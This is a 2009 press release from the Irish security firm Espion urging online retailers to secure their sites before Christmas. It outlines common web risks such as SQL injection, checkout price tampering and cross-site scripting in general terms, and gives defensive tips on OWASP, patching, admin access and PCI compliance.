Online retailers should look to secure sites and underlying systems to protect their businesses and customers’ personal data.
Dublin, Ireland, Monday 30th November 2009… Irish information security company Espion is encouraging online retailers become more aware of the risks to themselves and their customers and take the necessary steps to guarantee safe Christmas shopping this year.
“Given the increase in the amount of personal and financial information that will flow over the Internet in the coming weeks, opportunistic online criminals may try their luck by attempting to exploit weaknesses in online retail sites to gain access to lucrative information,” explains Colm Murphy, technical director with Espion. “Sites may also be vulnerable to hackers able to manipulate the sales process to purchase for free.”
Espion’s IT security specialists are highlighting that security should be an integral part of web application development, “Information security must be a continuous process, as technologies that improve user experiences online are often more complex and give rise to security vulnerabilities. The impact of these weaknesses in a retail context is significant, given the financial and personal data exchanged during an online transaction.”
Vulnerabilities – Ones to Watch:
- Customer data in transit – As customers send their personal information to online retailers, there needs to be an assurance that the data is protected. The encryption of customer data when in transit is becoming standard practice – consumers are increasingly aware of Hypertext Transfer Protocol Secure (HTTPS) used on retail sites that provides encryption and secure identification.
- Stored customer data – The majority of online retail sites have back-end databases that data is sent to and called from during a transaction. Hackers look to leverage mechanisms on the site, usually form fields or search functions, where data is relayed between the site and the database. ‘SQL injections’ are malicious database queries that disclose details of the back-end technologies and allow a hacker to assess restricted areas of the site, from which data can be compromised. Online retailers should also ensure that data stored is properly secured with the appropriate firewalls, anti virus and anti spyware technologies.
- Credit card data – Customer data stored or in transit requires significant levels of protection. When credit card information is part of this customer data, there are compliance requirements to be considered (PCI- DSS) that mandates that the appropriate information security measures are in place.
- Checkout Scams – This vulnerability is specific to online shopping carts and payment gateways, where hackers can manipulate the code with web application proxy to change the final payable price. While no customer information is compromised, the online retailer is essentially robbed. Depending on the price of the item or the volume of purchases, this can be extremely damaging if undetected and addressed in a timely manner.
- Cross-site Scripting (XSS) /Phishing attacks – XSS is a way of tricking customers to divulge sensitive data by appearing to be a legitimate site. The hackers use the site’s own code, edit it and republish it; either as a page or a pop up, to execute phishing attacks.
TIPS for online retailers:
- Make security part of your development – do not wait for an attack or breach. Understand where the weaknesses are and address them. Regularly test your site to ensure it is robust enough to resist attack. The Open Web Application Security Project (OWASP) is an organisation that provides practical information about computer and Internet applications. Open Web Application Security Project’s Top 10 project, explains the 10 most critical Web application security vulnerabilities and how to protect against them.
- If you are using open source applications, stay on top of any patches that are released. Often after a site is successfully breached, hackers move on to target other sites using the same open source applications to repeat the process.
- Ensure that any administrative sections of the site are secured against unauthorised access. Many sites are maintained by logging in to the site itself, this administrator login gives access to all areas of the site, possibly including details of the backend systems and location of sensitive data, which could be damaging if breached.
- If online retailers are taking and storing credit card information they are obliged to become PCI compliant. For many companies, this may be a valuable exercise and a prudent investment. For smaller sites, with limited resources, using a trusted third party payment service such as Pay Pal, Google Checkout can circumvent the need for this expense: taking credit card information out of the transaction processes and offering customers an increased level of confidence in your site.
Espion is an advisory practice specialising in information security. We work with companies to ensure that the critical information essential to their success is secure. Espion’s comprehensive approach is unique and highly effective and includes services to address information assurance, governance, risk and compliance, IT audit, forensic investigation and IT security training. Utilising a collaborative approach, our team of highly experienced consultants, look to fully understand the clients business first and from there determine the risks and exposures that they may have, and help the client understand, manage and mitigate those threats to information security.
Espion Forensics is operated by Espion Limited. Since 2001, Espion has assisted hundreds of Irish organisations successfully resolve a wide range of computer related forensic investigations. Our certified consultants and proven methodologies combine to provide a world-class forensic investigation service. We have worked with the leading government, financial and private organisations in Ireland and further a field. We have provided expert testimony in the Irish courts as well as employment tribunals and other forums. We can quickly and professionally assist in a variety of scenarios, and have the expertise and experience to ensure all incidents are handled in the manner expected by international standards.
Espion Ltd., The Old Church, Belmont, Galloping Green, Stillorgan, Co. Dublin
Ph: +353-1-2101711 www.espion.ie
For more information, please contact:
Colman Morrissey/Colm Murphy
01 210 1711
Practice PR & Events
053 94 296 76